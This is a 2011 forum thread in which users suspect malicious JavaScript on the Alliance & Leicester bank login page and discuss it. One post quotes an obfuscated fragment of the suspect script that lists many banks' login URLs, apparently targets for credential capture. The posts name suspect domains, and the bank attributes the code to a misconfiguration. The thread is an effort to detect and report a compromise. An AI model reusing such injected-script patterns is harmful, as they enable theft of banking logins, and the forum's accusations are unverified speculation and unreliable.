Do not login to A&L this morning - HACKED

edited 19 April 2011 at 8:01AM in Budgeting & Bank Accounts
61 replies 11.8K views
13567

Replies

  • WUM anyone?
    Thinking critically since 1996....
  • ashleyprideashleypride Forumite
    656 Posts
    Part of the Furniture 500 Posts Combo Breaker
    ✭✭
    mattcodes wrote: »
    Update: Ive had a response back from Santander PR team that they are investigating the issue.

    Thanks for letting us know. I don't quite understand why anybody would called you a spammer.
  • edited 19 April 2011 at 9:10AM
    mattcodesmattcodes Forumite
    19 Posts
    edited 19 April 2011 at 9:10AM
    If anyone wants to follow the trail take the javascript link from line 7 of A&L login page, load it and paste it into jsbeautifier, this will reveal the second js file, paste that into jsbeautifier and you'll see something clearly malicious. Im sorry its not being reported yet. ?

    I think Santander/Abbey might be a different system but Santander/A&L is definitely affected
    WUM anyone?

    Sorry nothing to gain from this. My account is with A&L and I dont want to see people at loss with this, in addition I dont want it covered up neither. If im a blagger you'll know for sure later today
  • mr_fishbulbmr_fishbulb Forumite
    5.2K Posts
    Part of the Furniture Combo Breaker
    ✭✭✭✭
    mattcodes wrote: »
    If anyone wants to follow the trail take the javascript link from line 7 of A&L login page, load it and paste it into jsbeautifier, this will reveal the second js file, paste that into jsbeautifier and you'll see something clearly malicious. Im sorry its not being reported yet. ?

    I think Santander/Abbey might be a different system but Santander/A&L is definitely affected

    Yes, all these different institutions listed in the code suggest something is afoot (and for once it's not my manhood!):
    http:\':\'V:\',x=\'allianceleicester\',k=\'18557\',l=\'v4.0\',m=\'ak\',n=Q,o=\'&U3=bankofamerica.7&U1=yahoo.7&U13=ebanking.W.7.hk/1/2/logon&U4=.abbeynational.9.E/EBAN_ENS/&U5=banking.firstdirect.7&U6=discovercard.7/cardmembersvcs/achome/homepage&U7=citibank&U9=.americanexpress.7/myca/acctsumm/us/&U2+U8=X.wellsfargo.7/das/Y-bin/session.Y&U12=halifax-X.9.E&U18=wachovia.7&Uo=banquepopulaire.fr/&U16=..de/Z/Z/&U11=.pncs.7.au/806015v47/&U21=ulsterbankanytimebanking./10.aspx&U15=ruralvia.7/10&U10=santander.cl/transa/segmentos/welcome.asp&U20=npbs.9.E&U14=coventrybuildingsociety.9.E&U17=.W.9.E/1/2/personal/&Uz21=/cmserver/verify.cfm&U19=.mybank.alliance-leicester
    
  • ashleyprideashleypride Forumite
    656 Posts
    Part of the Furniture 500 Posts Combo Breaker
    ✭✭
    mattcodes wrote: »
    If anyone wants to follow the trail take the javascript link from line 7 of A&L login page

    I was looknig at the wrong site, but yes it's still there and certainly looks nefarious.
  • glider3560glider3560 Forumite
    4.1K Posts
    Part of the Furniture 1,000 Posts Name Dropper
    ✭✭✭✭
    I believe advanced-web-analytics.com is something to do with that Rapport software
  • mr_fishbulbmr_fishbulb Forumite
    5.2K Posts
    Part of the Furniture Combo Breaker
    ✭✭✭✭
    glider3560 wrote: »
    I believe advanced-web-analytics.com is something to do with that Rapport software
    But what is polycache.com?
  • ashleyprideashleypride Forumite
    656 Posts
    Part of the Furniture 500 Posts Combo Breaker
    ✭✭
    But what is polycache.com?

    That is the question, from what I can tell A&L do usally have the https://www.advanced-web-analytics.com/18557/splash.js code. So if anything has been comprised it is this server.
  • Is this right? I can see advancedwebanalytcis in the RBS page as well?
  • Here's what I've just been told.

    While I am not able to go in to specifics regarding the activity, it appears the code was placed there willingly by the bank. Due to a misconfiguration these errors occurred. I was informed that the misconfiguration should be resolved and everything should be all set.
    Even if advanced-web-analytics is legit. I can't see the how polycache is legit. On some of the nodes it presents a cert for gate-logic.com, is hosted in a Linode VPS, is registered anonymously etc.. Ive saved copies of code to see what changes when they fix it.



This discussion has been closed.
Latest MSE News and Guides